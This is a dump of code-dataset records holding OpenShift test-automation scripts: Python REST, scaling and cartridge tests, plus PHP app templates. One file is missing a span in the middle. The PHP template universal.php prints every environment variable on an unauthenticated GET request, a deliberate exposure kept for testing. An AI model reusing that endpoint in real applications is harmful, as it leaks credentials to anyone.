(user_email, user_passwd)\n    (ret, output) = cmd_get_status_output(cmd)\n    if ret != 0:\n        print \"Failed to get domain info\"\n        return 1\n    if output.find(\"No namespaces found\") != -1:\n        print \"Namespace is destroyed. Try to create it again.\"\n        return create_domain(domain_name, user_email, user_passwd)\n    elif output.find(\"Namespace: %s\" % (domain_name)) != -1:\n        return 0\n    else:\n        print \"Alter namespace back\"\n        return alter_domain(domain_name, user_email, user_passwd)\n\n" }, { "alpha_fraction": 0.5329815149307251, "alphanum_fraction": 0.5329815149307251, "avg_line_length": 26.071428298950195, "blob_id": "a215ed73c7fdd728ef49c13246ec1ae605e52be0", "content_id": "0a6bd0a8924df3d39a2e75d7dcc8290f8aa4ee23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 379, "license_type": "no_license", "max_line_length": 134, "num_lines": 14, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/php/universal.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader(\"Content-Type: text/plain\");\nif(!empty($_GET[\"group\"])) {\n    $group = urldecode($_GET[\"group\"]);\n    if($group == \"env\") {\n        foreach ($_ENV as $key=>$val) {\n            echo $key.\"=\".$val.\"\\n\";\n        }\n    }\n}\nelse {\n    echo \"Usage: $_ENV[OPENSHIFT_APP_DNS]/universal.php?group=<group>\\nValid groups are 'shell', 'mongodb', 'mysql', 'postgresql'\\n\";\n}\n?>\n" }, { "alpha_fraction": 0.6268706321716309, "alphanum_fraction": 0.6471716165542603, "avg_line_length": 37.5512809753418, "blob_id": "08d14ed384a2a844dc25d49bbbf3a950361d38e4", "content_id": "7b782db3f682b0fa1ba48ca74dde2f8a1e2eb065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3007, "license_type": "no_license", "max_line_length": 118, "num_lines": 78, "path": "/automation/open/testmodules/RT/quick_start/quick_start_diy_binhello.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nimport urllib\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartDiyBinhello(QuickStartTest):\n    \n    def __init__(self, config):\n        rhtest.Test.__init__(self, config)\n        self.config.application_type = common.app_types[\"diy\"]\n        self.config.application_embedded_cartridges = [ ]\n        self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: DYI-Binhello\"\n        self.config.page = \"\" # means '/'\n        self.config.page_pattern = \"Hello, World!\"\n    \n    def configuration_steps(self):\n        self.log_info(\"Configuring\")\n        \n        # Getting binhello\n        # Saving to $GIT_REPO/bin\n        print \"Creating directory: %s/bin\" % self.config.application_name\n        os.mkdir(self.config.application_name + \"/bin\")\n        print \"Downloading remote binary\"\n        remote_binary = urllib.urlopen(\"https://raw.github.com/openshift/openshift-diy-binhello-demo/master/binhello\")\n        binhello_binary = open(\"%s/bin/binhello\" % self.config.application_name, \"w\")\n        binhello_binary.write(remote_binary.read())\n        binhello_binary.close()\n        print \"Adding execution permissions to the binary\"\n        os.chmod(\"%s/bin/binhello\" % self.config.application_name, 0755)\n        \n        #Editing configuration files\n        start_hook_filename = \"%s/.openshift/action_hooks/start\" % self.config.application_name\n        print \"Editing configuration file: \" + 
start_hook_filename\n        start_hook = open(start_hook_filename, \"w\")\n        start_hook.write(\"#!/bin/bash\\n\")\n        start_hook.write(\"cd $OPENSHIFT_REPO_DIR/bin\\n\")\n        start_hook.write(\"nohup ./binhello >${OPENSHIFT_DIY_LOG_DIR}/binhello.log 2>&1 &\\n\")\n        start_hook.close()\n        os.chmod(start_hook_filename, 0755)\n        \n        stop_hook_filename = \"%s/.openshift/action_hooks/stop\" % self.config.application_name\n        print \"Editing configuration file: \" + stop_hook_filename\n        stop_hook = open(stop_hook_filename, \"w\")\n        stop_hook.write(\"#!/bin/bash\\n\")\n        stop_hook.write(\"kill `ps -ef | grep binhello | grep -v grep | awk '{ print $2 }'` > /dev/null 2>&1\\n\")\n        stop_hook.write(\"exit 0\\n\")\n        stop_hook.close()\n        os.chmod(stop_hook_filename, 0755)\n        \n    def pre_deployment_steps(self):\n        self.log_info(\"Performing additional step before deploying\")\n        steps = [\n            \"cd %s\" % self.config.application_name,\n            \"git add .\",\n            \"git commit -a -m testing\"\n        ]\n        ret_code = common.command_get_status(\" && \".join(steps)) \n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(QuickStartDiyBinhello)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6268486976623535, "alphanum_fraction": 0.6308304667472839, "avg_line_length": 26.904762268066406, "blob_id": "8e13a33edfb847470d3706cca6dc24e182a1d69", "content_id": "dba789254e7adc2e75a5d4fa260e0a385db98c62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/automation/open/testmodules/RT/rest/rest_api_alias.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\n#import openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = self.config.OPENSHIFT_user_passwd\n        tcms_testcase_id=141682\n        params = {'klass': self, 'mode': 2, 'app_type': 'php'}\n        self = common.setup_testbed(**params)\n\n        #status, res = rest.app_create(self.app_name, self.app_type)\n\n    def finalize(self):\n        pass\n\n\nclass RestApiAlias(OpenShiftTest):\n    def test_method(self):\n        cf = self.config\n        rest = cf.rest_api\n        alias_name = \"my_other_name\"\n        invalid_alias_name = \"[]\"\n        self.info(\"Adding alias to existing app using REST API...\")\n        status, res = rest.app_add_alias(cf.app_name, alias_name)\n        self.info(\"OP STATUS: %s\" % status)\n        status, res = rest.app_remove_alias(cf.app_name, alias_name)\n        self.info(\"OP STATUS: %s\" % status)\n        status, res = rest.app_add_alias(cf.app_name, invalid_alias_name)\n        self.info(\"OP STATUS: %s\" % status)\n\n        #cf.rest_api.app_add_alias(\n        if status == 'Unprocessable Entity':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        else:\n            # any other status means the invalid alias was not rejected as expected\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(RestApiAlias)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5782644152641296, "alphanum_fraction": 0.6115166544914246, "avg_line_length": 
18.870967864990234, "blob_id": "0de22a5262d2344abc51315c14e9acf8736d3dc4", "content_id": "7dacc1c5fc256dc7803bdc1bbc36f2f891cb9b67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 88, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_141733.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_141733.py\n# Date: 2012/08/10 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass add_cron(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n\n        #create a jbosseap app\n        web.create_app(\"jbosseap-6.0\",\"jbosseap\")\n        time.sleep(5)\n        \n        #add cron cartridge\n        web.add_cartridge(\"jbosseap\", \"cron-1.4\")\n        web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n        #delete a jbosseap app\n        web.delete_last_app(\"jbosseap\")\n        \n        self.tearDown()\n\n        return self.passed(\" case 141733 is passed.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(add_cron)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_141733.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5732707977294922, "alphanum_fraction": 0.5821805596351624, "avg_line_length": 36.07826232910156, "blob_id": "f7417a1764b1cb36e384c585046653cf037580f8", "content_id": "258041bf5c38ec1820452adb5fde7104209861e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4265, "license_type": "no_license", "max_line_length": 166, "num_lines": 115, "path": "/automation/open/testmodules/RT/cartridge/detect_app_over_https.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1115] [rhc-cartridge]detect app come over https or http\nhttps://tcms.engineering.redhat.com/case/122351/\n\"\"\"\nimport os,sys,re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n# user defined packages\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1115] [rhc-cartridge]detect app come over https or http\"\n        try:\n            self.test_variant = self.config.test_variant\n        except:\n            self.test_variant = \"php\"\n\n        
(WORK_DIR, self.git_repo),\n \"jbossas\" : \"rm -f %s/src/main/webapp/index.html && cp -f %s/app_template/https/index.jsp %s/src/main/webapp/\" % (self.git_repo, WORK_DIR, self.git_repo)}\n\n self.steps_list.append(testcase.TestCaseStep(\"Copy the corresponding app template to the git repo\",\n type_to_cmd[self.test_variant],\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Git push the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"git push should succeed\",\n expect_return=0))\n\n def get_app_url(self, proto):\n def closure():\n return proto+\"://\"+OSConf.get_app_url(self.app_name)\n return closure\n\n if self.test_variant == \"php\":\n regex = r'X-Forwarded-Proto </td><td class=\"v\">http </td>'\n elif self.test_variant == \"jbossas\":\n regex = r'x-forwarded-proto:<BR>http<BR>'\n self.steps_list.append(testcase.TestCaseStep(\"Check the app through HTTP\",\n common.grep_web_page,\n function_parameters=[get_app_url(self,\"http\"), regex, \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"X-Forwarded-Proto should be http\",\n expect_return=0))\n\n if self.test_variant == \"php\":\n regex = r'X-Forwarded-Proto </td><td class=\"v\">https </td>'\n elif self.test_variant == \"jbossas\":\n regex = r'x-forwarded-proto:<BR>https<BR>'\n self.steps_list.append(testcase.TestCaseStep(\"Check the app through HTTPS\",\n common.grep_web_page,\n function_parameters=[get_app_url(self,\"https\"), regex, \"-H 'Pragma: no-cache' -k\", 3, 6],\n expect_description=\"X-Forwarded-Proto should be https\",\n expect_return=0))\n \n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DetectAppOverHttps)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5735849142074585, "alphanum_fraction": 0.5790356397628784, "avg_line_length": 44.86538314819336, "blob_id": "f851a916c5cf10785723f6bdca81dca3a56749ab", "content_id": "3a9759246a0c417fa837f5fc20773b6792dd47b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2385, "license_type": "no_license", "max_line_length": 240, "num_lines": 52, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/mysql/mysql.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n$con=mysql_connect(\"#host:#port\",\"#user\",\"#passwd\") or die(mysql_error());\nmysql_select_db(\"#dbname\",$con);\nmysql_query(\"CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));\", $con);\nmysql_query(\"COMMIT\", $con);\n$OPENSHIFT_GEAR_DNS = getenv(\"OPENSHIFT_GEAR_DNS\");\nif(!empty($_GET[\"action\"])) {\n if($_GET[\"action\"] == \"insert\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statements:<br />\";\n echo \"INSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing 
snapshoting and restoring big data in mysql database.');<br /><br />\";\n if(empty($_GET[\"size\"])) {\n $size = 500000;\n }\n else {\n $size = (int)$_GET[\"size\"];\n }\n mysql_query(\"SET autocommit=0;\");\n for($i = 0; $i < $size; $i++) {\n mysql_query(\"INSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\", $con);\n }\n mysql_query(\"COMMIT;\");\n mysql_query(\"SET autocommit=1;\");\n echo (string)$size.\" records have been inserted into mysql\";\n }\n elseif($_GET[\"action\"] == \"delete\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statement: DELETE FROM info;<br />\";\n mysql_query(\"DELETE FROM info;\", $con);\n echo \"All the records have been deleted from mysql database\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statement: SELECT * from info;<br />\";\n $result = mysql_query(\"SELECT * from info;\", $con);\n $num = mysql_num_rows($result);\n if($num > 0) {\n echo \"There are \".$num.\" records in database<br />Here's one row:\";\n $row = mysql_fetch_array($result);\n echo $row['id'],\", \",$row['data'],\"<br />\";\n }\n else {\n echo \"There is no record in database<br />\";\n }\n }\n else {\n echo \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\";\n }\n}\nmysql_query(\"COMMIT\", $con);\nmysql_close($con);\n?>\n" }, { "alpha_fraction": 0.5828945636749268, "alphanum_fraction": 0.590086042881012, "avg_line_length": 39.76439666748047, "blob_id": "1938bc9b0649151d77d7e9c381b17c3db2bc9999", "content_id": "250ba947c7ce1755a3720841c145ff6e90c7840b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7787, "license_type": "no_license", "max_line_length": 165, "num_lines": 191, "path": "/automation/open/testmodules/BI/rest/subaccount_delete.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: subaccount_delete.py\n# Date: 2012/10/02 16:08\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport brokerdb\n\n\nclass OpenShiftTest(rhtest.Test):\n #ITEST = [\"INT\", \"STG\"]\n\n def initialize(self):\n self.info(\"subaccount_delete\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.get_random_string(10)\n self.app_type = common.app_types[self.test_variant]\n self.subdomain = common.get_random_string(10)\n self.subaccount = common.get_random_string(10)\n self.gear_profile = 'small'\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass SubaccountDelete(OpenShiftTest):\n def test_method(self):\n common_options = ' -d nolinks=1 -s -k -H \"Accept:application/json\" -H \"X-Impersonate-User:%s\" -u %s:%s '%(self.subaccount, self.user_email, self.user_passwd)\n\n self.step(\"1. Create sub domain as sub account\")\n cmd = 'curl -X POST %s -d id=%s https://%s/broker/rest/domains'%(common_options, self.subdomain, self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"2. 
Add ssh key for sub account\")\n        cmd = 'curl %s -X POST --data-urlencode name=default -d type=%s --data-urlencode content=%s https://%s/broker/rest/user/keys'%(\n            common_options,\n            common.get_public_key_type(),\n            common.dump_public_key(),\n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('created', output)\n\n        self.step(\"3. Create app with sub account\")\n        cmd = 'curl %s -X POST -d name=%s -d cartridge=%s -d gear_profile=%s https://%s/broker/rest/domains/%s/applications'%(\n            common_options,\n            self.app_name,\n            self.app_type,\n            self.gear_profile,\n            self.config.instance_info['ip'],\n            self.subdomain)\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('was created', output)\n\n        self.step(\"4. Try to delete this sub account while an app belonging to it still exists.\")\n        cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n            common_options, \n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('has valid domain', output)\n        self.assert_match('unprocessable_entity', output)\n\n        self.step(\"5. Destroy app as sub account\")\n        cmd = 'curl %s -X DELETE https://%s/broker/rest/domains/%s/applications/%s'%(\n            common_options, \n            self.config.instance_info['ip'], \n            self.subdomain, \n            self.app_name)\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n\n        self.step(\"6. Try to delete this sub account while a domain belonging to it still exists.\")\n        cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n            common_options, \n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('has valid domain', output)\n        self.assert_match('unprocessable_entity', output)\n\n        self.step(\"7. Force clean sub domain as sub account\")\n        cmd = 'curl %s -X DELETE -d force=true https://%s/broker/rest/domains/%s'%(\n            common_options,\n            self.config.instance_info['ip'], \n            self.subdomain)\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n\n        self.step(\"8. Delete this sub account.\")\n        cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n            common_options, \n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n\n        self.step(\"Log into the instance, connect to mongodb, and run the following mongo shell command to verify this sub account is indeed deleted.\")\n        self.verify_mongo()\n\n        #9. Log into the instance, connect to mongodb, and run the following mongo shell command to verify this sub account is indeed deleted.\n\n        '''\n> db.user.findOne({\"_id\":\"<sub_account>\"})\n        '''\n\n        #(\"10. Repeat step 1~3, delete this subaccount with 'force' option when subaccount has domain and application associated.\")\n        self.step(\"10. Create sub domain as sub account\")\n        cmd = 'curl -X POST %s -d id=%s https://%s/broker/rest/domains'%(common_options, self.subdomain, self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n\n        self.step(\"11. 
Add ssh key for sub account\")\n        cmd = 'curl %s -X POST --data-urlencode name=default -d type=%s --data-urlencode content=%s https://%s/broker/rest/user/keys'%(\n            common_options,\n            common.get_public_key_type(),\n            common.dump_public_key(),\n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('created', output)\n\n        self.step(\"12. Create app with sub account\")\n        cmd = 'curl %s -X POST -d name=%s -d cartridge=%s -d gear_profile=%s https://%s/broker/rest/domains/%s/applications'%(\n            common_options,\n            self.app_name,\n            self.app_type,\n            self.gear_profile,\n            self.config.instance_info['ip'],\n            self.subdomain)\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n        self.assert_match('was created', output)\n\n        self.step(\"13. DELETE with (brute) FORCE\")\n        cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE -d force=true'%(\n            common_options,\n            self.config.instance_info['ip'])\n        (ecode, output) = common.cmd_get_status_output(cmd)\n        self.assert_equal(0, ecode)\n\n        self.step(\"14. Log into the instance, connect to mongodb, and run the following mongo shell command to verify this sub account is indeed deleted.\")\n        self.verify_mongo()\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n    def verify_mongo(self):\n        mongo = brokerdb.BrokerDB(collections=['user'], force_cache=True)\n        users = mongo.get_collection('user')\n        for u in users:\n            if u.has_key('parent_user_login'):\n                if u['parent_user_login'] == self.config.OPENSHIFT_user_email:\n                    self.assert_not_match(str(u['_id']), self.subaccount,\n                            \"Found subaccount entry in mongodb, which should have been deleted: %s\"%u)\n        '''\n        > db.user.findOne({\"_id\":\"<sub_account>\"})\n        > db.domains.find({_id:\"<namespace>\"})\n        > db.applications.find({UUID::<UUID>\",name:\"<app_name>\"})\n        '''\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(SubaccountDelete)\n    return suite\n\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of subaccount_delete.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5863651037216187, "alphanum_fraction": 0.5893149971961975, "avg_line_length": 32.52747344970703, "blob_id": "8f41e97812d49c68e53a2eef3f646cf890db39f6", "content_id": "f441d17617072b33ef6748b75b929ab65201c825", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3051, "license_type": "no_license", "max_line_length": 127, "num_lines": 91, "path": "/automation/open/testmodules/RT/scaling/exposed_gear_information.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.info(\"[US1907][BusinessIntegration] Retrieve exposed gear information for a scalable app\")\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = self.config.OPENSHIFT_user_passwd\n        self.test_variant = \"php\"\n        self.app_type = common.app_types[self.test_variant]\n        self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\n\nclass ExposedGearInformation(OpenShiftTest):\n    def verify_gear_info(self, scaled_up = False):\n        # Loading gear information\n        (gears, number_of_gears) = 
self.config.rest_api.get_gears(self.app_name)\n if scaled_up:\n expected_number_of_gears = 3\n else:\n expected_number_of_gears = 2\n\n php_proxy_exposed = True\n for gear in gears:\n for component in gear[\"components\"]:\n if component[\"name\"].startswith(\"php\") and component[\"proxy_port\"] is None and component[\"proxy_host\"] is None:\n php_proxy_exposed = False\n\n return (number_of_gears == expected_number_of_gears) and php_proxy_exposed\n\n def test_method(self):\n\n self.add_step(\n \"Creating a scalable application\",\n common.create_scalable_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n self.add_step(\n \"Getting and Verifying gear information\",\n self.verify_gear_info,\n function_parameters = [ False ],\n expect_description = \"Expected number of gears: 2, PHP proxy ports must be exposed\",\n expect_return = True) \n\n self.add_step(\n \"Scaling-up\",\n self.config.rest_api.app_scale_up,\n function_parameters = [self.app_name],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 'OK')\n\n self.add_step(\n \"Getting and Verifying gear information - the application is scaled-up\",\n self.verify_gear_info,\n function_parameters = [ True ],\n expect_description = \"Expected number of gears: 3, PHP proxy ports must be exposed\",\n expect_return = True) \n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ExposedGearInformation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5326917171478271, "alphanum_fraction": 0.5373548865318298, "avg_line_length": 33.27891159057617, "blob_id": "63c2835d5960b469512108b321b6bb9d3e9b7951", "content_id": "c2402aadca141b0bc24e46895259c1d66abc1774", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10079, "license_type": "no_license", "max_line_length": 107, "num_lines": 294, "path": "/automation/open/testmodules/BI/US2105.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: US2105.py\n# Date: 2012/10/03 10:04\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n #ITEST = [\"INT\", \"STG\"]\n\n def initialize(self):\n self.info(\"US2105\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n if common.app_types.has_key(self.test_variant):\n self.app_type = self.test_variant\n self.cart_variant = None\n else:\n self.app_type = 'php'\n self.cart_variant = self.test_variant\n self.info(\"VARIANT: %s\"%self.test_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass US2105(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.app_type],\n self.user_email, \n self.user_passwd, \n False],\n expect_return=0)\n\n if self.cart_variant is not None:\n if common.cartridge_deps.has_key(self.cart_variant):\n self.add_step(\"Embed a dep cartridge\", \n common.embed,\n 
function_parameters=[self.app_name,\n                    \"add-%s\"%common.cartridge_types[common.cartridge_deps[self.cart_variant]], \n                    self.user_email, \n                    self.user_passwd],\n                    expect_return=0)\n\n            self.add_step(\"Embed a cartridge\", \n                    common.embed,\n                    function_parameters=[self.app_name,\n                             \"add-%s\"%common.cartridge_types[self.cart_variant], \n                             self.user_email, \n                             self.user_passwd],\n                    expect_return=0)\n\n        self.add_step(\"Verify ENV\", self.verify_env, expect_return = 0)\n        self.run_steps()\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n    def verify_zend(self):\n        present = ['OPENSHIFT_ZEND_IP',\n                   'OPENSHIFT_ZEND_PORT',\n                   'OPENSHIFT_ZEND_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_haproxy(self):\n        present = ['OPENSHIFT_HAPROXY_INTERNAL_IP',\n                   'OPENSHIFT_HAPROXY_STATUS_IP',\n                   'OPENSHIFT_HAPROXY_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_metrics(self):\n        present = ['OPENSHIFT_METRICS_IP',\n                   'OPENSHIFT_METRICS_PORT',\n                   'OPENSHIFT_METRICS_LOG_DIR']\n        self.assert_match(present, self.env_output)\n        removed = ['OPENSHIFT_METRICS_CTL_SCRIPT',\n                   'OPENSHIFT_METRICS_GEAR_DIR']\n        self.assert_not_match(removed, self.env_output)\n\n\n    def verify_diy(self):\n        present = ['OPENSHIFT_DIY_IP',\n                   'OPENSHIFT_DIY_PORT']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_jbossas(self):\n        removed = ['OPENSHIFT_JBOSS_']\n        self.assert_not_match(removed, self.env_output)\n\n        present = ['OPENSHIFT_JBOSSAS_IP',\n                   'OPENSHIFT_JBOSSAS_PORT',\n                   'OPENSHIFT_JBOSSAS_CLUSTER',\n                   'OPENSHIFT_JBOSSAS_CLUSTER_PORT',\n                   'OPENSHIFT_JBOSSAS_CLUSTER_PROXY_PORT',\n                   'OPENSHIFT_JBOSSAS_CLUSTER_REMOTING',\n                   'OPENSHIFT_JBOSSAS_MESSAGING_PORT',\n                   'OPENSHIFT_JBOSSAS_MESSAGING_THROUGHPUT_PORT',\n                   'OPENSHIFT_JBOSSAS_REMOTING_PORT',\n                   'OPENSHIFT_JBOSSAS_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_perl(self):\n        present = ['OPENSHIFT_PERL_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n    def verify_mysql(self):\n        removed = ['OPENSHIFT_DB_']\n        self.assert_not_match(removed, self.env_output)\n\n        present = ['OPENSHIFT_MYSQL_DB_GEAR_DNS',\n                   'OPENSHIFT_MYSQL_DB_GEAR_UUID',\n                   'OPENSHIFT_MYSQL_DB_HOST',\n                   'OPENSHIFT_MYSQL_DB_USERNAME',\n                   'OPENSHIFT_MYSQL_DB_PASSWORD',\n                   'OPENSHIFT_MYSQL_DB_PORT',\n                   'OPENSHIFT_MYSQL_DB_SOCKET',\n                   'OPENSHIFT_MYSQL_DB_URL',\n                   'OPENSHIFT_MYSQL_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_jbosseap(self):\n        present = ['OPENSHIFT_JBOSSEAP_IP',\n                   'OPENSHIFT_JBOSSEAP_PORT',\n                   